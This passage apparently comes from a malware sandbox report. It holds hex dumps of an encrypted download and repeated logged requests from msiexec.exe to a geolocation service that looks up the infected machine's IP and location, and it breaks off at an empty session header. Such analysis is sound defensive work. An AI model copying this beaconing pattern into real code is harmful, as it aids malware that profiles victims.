                                                                                      Data Ascii: g)Pd@+_8-aqMaIw4tm]bvptp<1;dirU^w2S->"=C?* ^Ir#Tym2Z|jm<Zg`yLfm-`f4K8lVg#ehZ^_Q_D.@P&=m_
                                                                                      2024-10-21 09:16:50 UTC1378INData Raw: c0 4d 2d 50 cd 7b f3 54 cd c9 7a 62 ec c8 09 c3 8f 8c 40 22 77 a9 30 50 ba d7 93 ba 62 57 2a ec f1 25 2f bb 62 55 e5 d7 88 a9 b8 59 da 18 6e 63 c5 a4 9c 73 eb 0d 51 10 8a f8 b5 d0 0e 58 90 78 6d 6a 42 17 9f 08 fe 0e 3a 46 f1 fe fb 98 b7 11 b9 6e 54 d1 8f 76 b9 13 8f 54 de 75 ee c3 90 30 d7 d1 1e 44 80 7d 95 e6 dc 81 c1 03 11 50 ae 4e b0 9f 88 c2 d0 84 f6 cb 5a 5d 39 1f c8 2e 02 20 ae 58 a0 54 b1 8d 02 b5 0f 81 d3 fb 48 d0 9c d4 57 55 71 b0 0f 2b 02 1c 26 db 5a 32 89 3a 16 24 92 ef 1e 41 cb be a6 9b dd b1 13 c1 ac d2 79 09 be 73 43 98 84 71 eb 4e 59 f6 fd 51 6a 93 0c 24 dc 72 95 03 06 08 68 58 6b ed cb dd f9 ba 7c 5c ac 40 0d 1f a9 e4 eb ee ed d2 c3 7b ec 23 93 91 e4 de 3f 7d d3 fe dd 68 4d dd c5 ad 1c 36 00 8c cb 76 44 ab 9c 0a c5 9c db 61 cd f8 0d 57 7c
                                                                                      Data Ascii: M-P{Tzb@"w0PbW*%/bUYncsQXxmjB:FnTvTu0D}PNZ]9. XTHWUq+&Z2:$AysCqNYQj$rhXk|\@{#?}hM6vDaW|
                                                                                      2024-10-21 09:16:50 UTC1378INData Raw: b2 e2 53 db 3d 7f af 28 97 fa ab 9e 0d bc 3a d9 3a 34 b4 55 f3 11 f3 e9 51 99 13 5d 6f 11 69 9e 28 16 d0 05 4f 9b 56 9e e2 0e 71 37 cd d9 6f b9 33 23 a7 17 c8 81 88 ae 50 2d 23 f1 12 9b 5a db 4d 6d 27 26 26 ba b2 c1 e5 32 a4 07 65 06 84 76 bc 63 bf 1a d9 ab d7 97 3a f9 67 e0 c0 8f bf c5 6d f8 16 a4 20 2a 1f 5e 74 81 38 58 d6 54 63 53 5f 70 13 dc 20 68 03 e4 36 81 f5 12 57 33 10 76 f1 24 37 a7 28 49 4c 34 a2 1f 10 7b 85 9b bd 4d f1 f7 7b de dc f0 4c 28 b8 f7 c2 d2 87 7d 9d cd df a1 5f c3 9e 5a 70 3b de 9e 0c cc ed 91 46 0c b2 61 d6 0d d4 79 51 63 27 9f 76 fb 86 87 1c bf 51 8e 25 2c 21 97 e6 c0 87 a1 c7 59 8b 88 41 da 53 6e 92 9b 0e ef ec 39 96 2e bf 33 18 37 97 7b da 3a e4 a5 e8 89 99 47 f3 ad df ad ae 36 3a 01 c9 1d 40 51 bd 34 42 e8 50 85 a1 d2 ed 7a a2
                                                                                      Data Ascii: S=(::4UQ]oi(OVq7o3#P-#ZMm'&&2evc:gm *^t8XTcS_p h6W3v$7(IL4{M{L(}_Zp;FayQc'vQ%,!YASn9.37{:G6:@Q4BPz
                                                                                      2024-10-21 09:16:50 UTC1378INData Raw: d4 66 4f 70 ad 3a c3 c5 11 0c 67 94 ec a5 c2 a6 4f 29 21 8a f1 7f 3e f1 b7 84 fb d1 e7 d3 83 94 dc 10 ff 58 bf e6 32 d7 a0 28 65 f2 76 5b ad 46 49 91 79 77 38 e8 d0 72 73 ef 1f 03 f4 c3 24 16 d4 18 62 22 e3 76 40 af 47 b8 8f 49 9a a1 5c 2e 2f 16 25 39 fd e6 a9 8c 1a d6 19 21 86 77 79 24 e1 ac 32 76 ce 20 ca 25 07 a1 99 22 e2 21 cf 13 c8 88 aa e6 6c f9 84 05 e2 91 d1 5b e6 c8 ed 21 8e 55 2d ca 65 ec cf ec 22 50 01 b5 6b 52 d9 e1 a1 df 8b 8f 4f 4b 07 d1 df 65 49 b5 62 e7 35 51 32 d0 ab e0 ff 76 ed f7 58 8b 39 f3 05 1f f8 ff 8b 04 2d c7 a7 eb a0 b8 86 3a 28 fd ea b2 28 af 61 ca 7e 30 84 d2 ae 1a b1 92 b0 b6 85 99 3e 7d aa 66 ce 41 b2 c6 6d 20 dc d1 64 f3 bd df a0 98 5b cb 7c 90 ad 3c 82 7c 59 5b 50 3f 9c 7b 94 26 9e ff 3c e5 71 93 b9 f2 f5 c9 7c dd 76 ce 8f
                                                                                      Data Ascii: fOp:gO)!>X2(ev[FIyw8rs$b"v@GI\./%9!wy$2v %"!l[!U-e"PkROKeIb5Q2vX9-:((a~0>}fAm d[|<|Y[P?{&<q|v
                                                                                      2024-10-21 09:16:50 UTC1378INData Raw: 4d 49 71 43 ce 9a cc 85 1f 34 1b 74 f5 d5 e7 0a f8 a3 62 d0 16 e3 30 b5 c1 7a 84 61 be df 56 06 2d f4 64 f4 9e e1 3d 1a f1 41 05 05 3a 92 bd ca f0 46 23 1a 20 49 09 5f 32 3d 7f 98 d9 75 bc 92 e0 9f 16 af 1a 6f 8d b5 a4 e4 e3 99 b6 0f 20 c9 ed 77 ea c0 88 59 08 d8 ba dc b4 c2 39 00 5d e9 88 5a 6a 31 d5 79 d3 44 b6 f8 b0 a6 f5 f8 96 38 e7 36 f0 07 69 27 97 2d e8 66 87 e3 64 58 25 64 01 ea f2 a7 7d 63 cb 5f e8 85 12 8b 5d c8 07 8f 7c fb a1 49 0a e4 7c 3b bd 35 04 93 55 40 95 55 17 dd 4f 03 b2 06 e9 c1 17 fb 4e 32 6a 1d b6 ec 72 6e 54 2d 66 55 11 b0 80 b6 d7 55 6e d8 f1 a0 2d b4 79 c1 c2 11 ba 64 ea 8f 94 02 7c 18 66 a7 5f b2 87 f6 a1 01 e6 ae 20 59 bc 41 7f 00 46 5a 58 b7 b9 86 22 43 fa b5 3d 9d 62 06 71 c7 4e f2 0e c3 7b 81 57 d1 b5 1c 93 33 8e ce d3 47 ae
                                                                                      Data Ascii: MIqC4tb0zaV-d=A:F# I_2=uo wY9]Zj1yD86i'-fdX%d}c_]|I|;5U@UON2jrnT-fUUn-yd|f_ YAFZX"C=bqN{W3G
                                                                                      2024-10-21 09:16:50 UTC1378INData Raw: be b4 4e 80 77 eb 07 d0 81 cc 3e 37 2b e3 5c b0 ef fc dd 0c 5a e1 c6 3b 69 39 15 d3 1f 78 60 86 3a a4 7c 85 50 61 b5 0f 5f c3 de 60 9a ae d4 5d 42 20 e7 25 49 72 0a 04 84 5a 32 83 2c 96 12 81 ea 0b 36 a5 76 a4 eb cb e7 bd c1 ac dc 1d c6 bd 60 17 9f 88 dc b7 53 de a0 03 50 78 b0 0b 50 91 4d 94 73 a4 2d 6b 8e d9 d0 cb d7 5d ec a4 2e 22 45 25 ae 0b c1 f8 90 a6 10 c3 7f 44 15 8e f2 51 af 05 0d 71 df b5 d5 67 dd cf c6 7a 13 1c f4 0b 68 43 b4 fb 22 b0 96 a5 56 de dd 77 79 ba 10 f1 22 72 a6 30 ce 4b 4a 52 99 8d ff d7 fb 40 6c c0 aa 5e 69 8c 1b f7 30 08 dd 61 71 a3 47 12 a4 35 05 89 91 e7 7e 47 bd fd 65 77 15 53 7d a2 4e 99 3e 60 fa 01 d7 30 8e 27 60 51 b1 99 58 1d 11 de 96 53 f6 6c eb c2 62 ed e0 dd 53 2e 2e 65 06 29 ef b3 35 a7 85 1f 7d ee 08 df 4a 14 a0 ae c6
                                                                                      Data Ascii: Nw>7+\Z;i9x`:|Pa_`]B %IrZ2,6v`SPxPMs-k]."E%DQqgzhC"Vwy"r0KJR@l^i0aqG5~GewS}N>`0'`QXSlbS..e)5}J
                                                                                      2024-10-21 09:16:50 UTC1378INData Raw: d5 70 ec ae 25 1b 50 ed a4 21 22 9d e8 63 57 f7 3a c4 ae 1b 61 03 85 9c b5 e8 03 b9 33 10 78 53 10 2d ba af 5f 4c 4e 00 1f 01 7b 85 97 d2 cf e1 d2 59 f9 fe eb cb 7b b2 f7 eb 95 91 0f cd 04 df d1 fd e6 f7 47 c4 3b da e6 f9 eb f5 93 de 2b 33 11 74 22 db f9 68 70 2c 8a df e7 57 f4 27 bc 2f d5 87 04 50 bf 0d ca 94 88 c2 7d 83 be 41 d0 57 3c a0 86 0e 9f d2 66 17 2e b5 39 0e b7 a9 68 d7 2f f8 be 43 f3 8e 47 95 fb b6 ad ae 38 12 68 c9 11 4a 40 b6 3d 02 e8 5a 81 f7 c7 ed 7a a0 9c 0e a7 ad 36 0b aa 7e 40 3b 67 98 14 8e 64 b3 16 1f 0e a8 45 41 66 37 da 38 e0 51 82 55 38 59 0a 2f 32 3d 89 20 73 7a bf 56 49 19 74 42 7e fc e1 0c 9a e7 cb 64 df 72 e6 b2 e1 3b 2c 67 7c 89 2c 3a 1b 96 45 1b 55 13 3e 1c 34 a5 8b c1 cb 24 75 25 0e 7a bd aa 9e 0c bf e3 a3 0e 81 b4 11 f9 f9
                                                                                      Data Ascii: p%P!"cW:a3xS-_LN{Y{G;+3t"hp,W'/P}AW<f.9h/CG8hJ@=Zz6~@;gdEAf78QU8Y/2= szVItB~dr;,g|,:EU>4$u%z


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.449739188.114.97.34437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-21 09:16:53 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-21 09:16:53 UTC894INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:16:53 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 27878
                                                                                      Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kwRg4mwPJEBy1O7k0LLW3FMGzMrbHJjN0eQxDLInWqh%2FFbepePhihQ6AKzq9vpSEPpYZ5iqNFsGLWRXtCef0fpeeHHy%2F65GvaJWdcCpkUr%2Fk9qAJw7fx1req3ksOpbQ2tVkTs5JS"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d6026c47efae792-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1511&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1907773&cwnd=250&unsent_bytes=0&cid=0620c3e8d58b858c&ts=165&x=0"
                                                                                      2024-10-21 09:16:53 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                      Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                      2024-10-21 09:16:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.449740188.114.97.34437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-21 09:16:54 UTC63OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-21 09:16:54 UTC898INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:16:54 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 27879
                                                                                      Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xhpdlhg87syYV%2B5pp4xUuR5FYGb%2BunqMBUn1uBFQOjXwXIHwGIxEF7Tb05rEAJ8flwlIfi%2FwqWVEv43PKJ7wOArXhK5slt7xWIz2988UGcK8m4hqXRfpdZ8lo%2FEDdgo%2F9ptqTadY"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d6026cad82d2832-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1274&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2234567&cwnd=251&unsent_bytes=0&cid=d381a55e122240fe&ts=152&x=0"
                                                                                      2024-10-21 09:16:54 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                      Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                      2024-10-21 09:16:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.449742188.114.97.34437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-21 09:16:56 UTC63OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-21 09:16:56 UTC896INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:16:56 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 27881
                                                                                      Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NgpXlJdjyyEbhq226PBwA%2F3DVse%2FwvfIg6q5PXjCF5Rzl6k6rJMVdsDS8Zqmz05aOD6YHIdzz4FoOq6g08X3JuYCx%2Byn0ksHc73u60pfaTNwRJ2IoBN0EQh9A1ErAI8%2BzYJnYvPX"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d6026d51b8b2ca5-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2077&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1392307&cwnd=250&unsent_bytes=0&cid=e738f2b9cc3d93fe&ts=155&x=0"
                                                                                      2024-10-21 09:16:56 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                      Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                      2024-10-21 09:16:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.449744188.114.97.34437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-21 09:16:58 UTC63OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-21 09:16:58 UTC896INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:16:58 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 27883
                                                                                      Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sY1OhZ32YaG%2BGIfyKDbQJzRmOLG%2FUtO264r2a2RyqOXc4eYul1rl6nbCZKEQLmwfb2TtDfrRWZZi%2FGrhVPR0j3LRzWYK9SW0ByWaSi0bVgOmfmX%2B0W0I22I0QjdWLQ9c44srqukD"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d6026df5d634786-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2533683&cwnd=248&unsent_bytes=0&cid=c253b77a7b98dd0a&ts=150&x=0"
                                                                                      2024-10-21 09:16:58 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                      Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                      2024-10-21 09:16:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.449746188.114.97.34437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-21 09:16:59 UTC63OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-21 09:16:59 UTC900INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:16:59 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 27884
                                                                                      Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Ht60i6el3ZciecSn%2Bb7RFiBd82PDueEr7u0j6E%2FQiRzvqoGSyQRXe5k5cA0xr7F3%2FprARGdhG5lyJ4Fj81Ogf6N74R5torZNCxgeV1JQC%2Bdz4qTGkraDowpfa4%2BY6%2FB8YmEZHhd"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d6026e999fd6b46-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1910&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1462626&cwnd=246&unsent_bytes=0&cid=392a533e32d1b9c6&ts=160&x=0"
                                                                                      2024-10-21 09:16:59 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                      Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                      2024-10-21 09:16:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.449748188.114.97.34437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-21 09:17:01 UTC63OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-21 09:17:01 UTC900INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:17:01 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 27886
                                                                                      Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G5y3ZirXNG%2FBOB9mLL%2BBvZ%2B9MyE6Hc5Xk9gTh7KTdi1YAfKFWPfIkGb5ErR6SHPXCnKfwJ7ni9ymH1U%2Fa5DjLdN6grOESdKkUB0RCCzkjSmRc%2FiGkFzcuZxmU9j21k9%2FdgIw2hAx"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d6026f3b9da4758-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2112&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1373814&cwnd=250&unsent_bytes=0&cid=3a19f7a94ad91a46&ts=153&x=0"
                                                                                      2024-10-21 09:17:01 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                      Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                      2024-10-21 09:17:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.449750188.114.97.34437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
